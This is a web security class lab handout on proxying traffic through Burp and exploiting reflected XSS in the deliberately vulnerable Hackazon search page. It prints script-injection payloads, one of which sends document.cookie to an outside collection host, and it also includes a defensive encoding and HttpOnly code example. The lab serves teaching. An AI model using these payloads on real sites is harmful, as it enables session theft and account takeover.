W 230: Manual Audit of Hackazon (10 pts)

What You Need

Purpose

To practice finding and exploiting several common Web vulnerabilities. I am following this blog.

1. Burp Setup

Configuring the Burp Proxy

Start Burp. On the Proxy tab, on the Intercept sub-tab, turn off Intercept.

On the Options sub-tab, make sure the proxy is listening on 127.0.0.1:8080 as shown below.

Configuring a Firefox Proxy

In Firefox, at the top right, click the three-bar "hamburger" icon and click Preferences.

In Preferences, search for proxy. Click the Settings... button.

Configure Firefox to use the 127.0.0.1 proxy on port 8080 for all protocols, as shown below.

Loading an HTTP Web Page

In Firefox, go to

http://ad.samsclass.info/

On the "HTTP history" sub-tab, you should see a request to http://ad.samsclass.info, as shown below.

Downloading the Burp Certificate

In Firefox, go to

http://burp

At the top right, click "CA Certificate", as shown below.

Save the certificate in your Downloads folder.

Installing the Certificate in Firefox

In Firefox Preferences, search for certificate. Click the "View Certificates..." button.

In the Certificate Manager box, click the Import... button.

Navigate to the certificate you downloaded, as shown below, and double-click it.

A box pops up, as shown below. Click "Trust this CA to verify websites" and click OK.

In the Certificate Manager box, click OK.

Loading an HTTPS Web Page

In Firefox, go to

https://hackazons.samsclass.info/

On the "HTTP history" sub-tab, you should see an HTTPS request. Click it.

In the lower pane, on the Request tab, on the Params sub-tab, you should see a PHPSESSID cookie value, as shown below.

2. Reflected XSS in Search Function

User Input Handling

In Firefox, go to

https://hackazons.samsclass.info/

Search for

shoes

No results are found, but the query "shoes" appears in the results page, as shown below.

When data from the user is echoed back into a Web page without being sanitized or encoded, it can contain scripts, causing a reflected XSS vulnerability.

Simple Proof-of-Concept

To test for that, search for

shoes<script>alert(1);</script>

An alert box pops up, as shown below.

Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.

Revealing a Cookie

Search for

shoes<script>alert(document.cookie);</script>

An alert box pops up, showing cookie values, as shown below.
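The reflection problem described above, as an added example that is not Hackazon's code: a constructed stand-in for the search results page in its vulnerable and output-encoded forms, a check for whether a probe string comes back verbatim, and a PHPSESSID cookie set with HttpOnly so that document.cookie cannot read it. The template, function names and session value are assumptions.

```python
import html
from http import cookies

# Constructed stand-in for the search results page. Hackazon's real
# template is not shown on this page; this one only reproduces the
# behaviour of echoing the query into the HTML.
TEMPLATE = "<h1>Search results for: {query}</h1><p>No results found.</p>"


def render_search_vulnerable(query: str) -> str:
    """Interpolates the raw query into the page: any <script> in it runs."""
    return TEMPLATE.format(query=query)


def render_search_safe(query: str) -> str:
    """Encodes the query for an HTML text-node context.

    html.escape turns < > & " ' into entities, so the browser renders the
    query as text.  This is the right encoding for a text node only; an
    attribute, URL or inline-script context needs its own encoder.
    """
    return TEMPLATE.format(query=html.escape(query, quote=True))


def reflected_unescaped(page: str, probe: str) -> bool:
    """True when the probe appears in the response exactly as sent.

    A probe containing HTML metacharacters that comes back byte-for-byte
    is the same signal the manual test above looks for with the alert box.
    """
    return probe in page


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for PHPSESSID with HttpOnly, Secure and SameSite.

    HttpOnly removes the cookie from document.cookie, so a reflected script
    cannot read it; the XSS itself still has to be fixed by encoding.
    """
    jar = cookies.SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    probe = "shoes<script>alert(1);</script>"  # payload from the lab above
    print("vulnerable reflects:", reflected_unescaped(render_search_vulnerable(probe), probe))
    print("encoded reflects:   ", reflected_unescaped(render_search_safe(probe), probe))
    print(session_cookie_header("constructed-session-id"))
```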

Viewing a Product

In the Hackazon page, click OK to close the pop-up box.

At the top left, click the red HACKAZON logo to return to the home page.

Click a product to view it, as shown below.

Flag M 230.1: Stealing Cookies (10 pts)

In the Hackazon page, search for

<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>

In a browser, go to:

https://attack32.samsclass.info/tmp/data.txt

Your stolen cookie appears at the end of the list.

The flag is covered by a green box in the image below.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image of Firefox showing the flag.

Save the image as "Proj W 230.1 from YOUR NAME".

Turning In Your Project

Email the images to cnit.129s@gmail.com with a subject of "W 230 from YOUR NAME".

Sources

Hacking Hackazon

Posted 2-6-2020